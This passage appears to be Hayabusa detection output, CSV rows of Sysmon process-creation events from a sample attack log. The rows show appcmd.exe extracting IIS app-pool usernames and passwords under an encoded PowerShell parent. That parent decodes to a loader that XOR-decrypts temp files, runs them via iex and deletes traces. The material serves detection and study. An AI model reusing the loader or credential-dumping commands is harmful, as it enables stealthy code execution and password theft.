ABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.190 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: 
""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.270 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""ERROR ( message:Configuration error "" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.350 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.581 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.661 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: redirection.config"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.731 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Filename: 
redirection.config"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.811 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAY
wB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.891 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential 
Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:17.971 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaA
BdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.041 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Line Number: 0"" /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 
JABQAHIAbwBnAHIAZQBzAHMAUAByAGUAZgBlAHIAZQBuAGMAZQAgAD0AIAAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAcABhAHQAaABfAGkAbgBfAG0AbwBkAHUAbABlAD0AIgBDADoAXABXAGkAbgBkAG8AdwBzAFwAVABlAG0AcABcADYAagByAHgAawAzAFwAZwBmAGcAOQBpACIAOwAkAHAAYQB0AGgAXwBpAG4AXwBhAHAAcABfAGMAbwBkAGUAPQAiAEMAOgBcAFcAaQBuAGQAbwB3AHMAXABUAGUAbQBwAFwANgBqAHIAeABrADMAXABuAGoAYQA5AHQANgA0AHIAcgBsAHUAOAAiADsAJABrAGUAeQA9AFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAVABGADgALgBHAGUAdABCAHkAdABlAHMAKAAnADgAZAA5ADYAOQBlAGUAZgA2AGUAYwBhAGQAMwBjADIAOQBhADMAYQA2ADIAOQAyADgAMABlADYAOAA2AGMAZgAwAGMAMwBmADUAZAA1AGEAOAA2AGEAZgBmADMAYwBhADEAMgAwADIAMABjADkAMgAzAGEAZABjADYAYwA5ADIAJwApADsAJABlAG4AYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAHAAYQB0AGgAXwBpAG4AXwBtAG8AZAB1AGwAZQApADsAJABlAG4AYwBfAGEAcABwAF8AYwBvAGQAZQA9AFsAUwB5AHMAdABlAG0ALgBJAE8ALgBGAGkAbABlAF0AOgA6AFIAZQBhAGQAQQBsAGwAQgB5AHQAZQBzACgAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACkAOwAkAGQAZQBjAF8AbQBvAGQAdQBsAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AbQBvAGQAdQBsAGUALgBMAGUAbgBnAHQAaAA7ACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAQgB5AHQAZQBbAF0AIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwBmAG8AcgAgACgAJABpACAAPQAgADAAOwAgACQAaQAgAC0AbAB0ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAA9ACAAJABlAG4AYwBfAG0AbwBkAHUAbABlAFsAJABpAF0AIAAtAGIAeABvAHIAIAAkAGsAZQB5AFsAJABpACAAJQAgACQAawBlAHkALgBMAGUAbgBnAHQAaABdADsAfQA7AGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAGUAbgBjAF8AYQBwAHAAXwBjAG8AZABlAC4ATABlAG4AZwB0AGgAOwAgACQAaQArACsAKQAgAHsAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQBbACQAaQBdACAAPQAgACQAZQBuAGMAXwBhAHAAcABfAGMAbwBkAGUAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACQAawBlAHkAWwAkAGkAIAAlACAAJABrAGUAeQAuAEwAZQBuAGcAdABoAF0AOwB9ADsAJABkAGUAYwBfAG0AbwBkAHUAbABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYA
OAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAG0AbwBkAHUAbABlACkAOwAkAGQAZQBjAF8AYQBwAHAAXwBjAG8AZABlAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAVQBUAEYAOAAuAEcAZQB0AFMAdAByAGkAbgBnACgAJABkAGUAYwBfAGEAcABwAF8AYwBvAGQAZQApADsAJAAoACQAZABlAGMAXwBtAG8AZAB1AGwAZQArACQAZABlAGMAXwBhAHAAcABfAGMAbwBkAGUAKQB8AGkAZQB4ADsAUgBlAG0AbwB2AGUALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAGEAdABoAF8AaQBuAF8AYQBwAHAAXwBjAG8AZABlACAALQBGAG8AcgBjAGUAIAAyAD4AJgAxACAAfAAgAE8AdQB0AC0ATgB1AGwAbAA7AA==",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.121 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.202 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool /text:processmodel.password : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 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",rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/discovery_sysmon_1_iis_pwd_and_config_discovery_appcmd.evtx -2019-05-27 10:29:18.282 +09:00,IEWIN7,1,informational,Process Creation,"Command: ""C:\Windows\System32\inetsrv\appcmd.exe"" list apppool ""Description: Cannot read configuration file 
due to insufficient permissions"" /text:processmodel.username : Path: C:\Windows\System32\inetsrv\appcmd.exe : User: IIS APPPOOL\DefaultAppPool : Parent Command: ""C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"" -nop -noni -enc 